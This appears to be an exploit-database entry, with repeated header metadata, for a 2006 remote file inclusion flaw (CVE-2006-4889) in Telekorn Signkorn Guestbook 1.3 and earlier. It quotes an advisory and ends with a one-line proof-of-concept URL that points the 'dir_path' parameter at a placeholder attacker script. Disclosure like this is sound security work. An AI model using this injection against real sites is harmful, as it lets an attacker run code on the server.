Telekorn Signkorn Guestbook 1.x - '/admin/admin.php?dir_path' Remote File Inclusion
| EKU-ID: 33766 | CVE: CVE-2006-4889;OSVDB-32218 | OSVDB-ID: |
| Author: ThE_LeO | Published: 2006-09-12 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 33766 | CVE: CVE-2006-4889;OSVDB-32218 | OSVDB-ID: |
| Author: ThE_LeO | Published: 2006-09-12 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/19977/info Telekorn Signkorn Guestbook is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. This may allow the attacker to compromise the application and the underlying system; other attacks are also possible. Versions 1.3 and earlier are affected by this issue. http://www.example.Com/[Script]/admin/admin.php?dir_path=[U r Evil Script] ;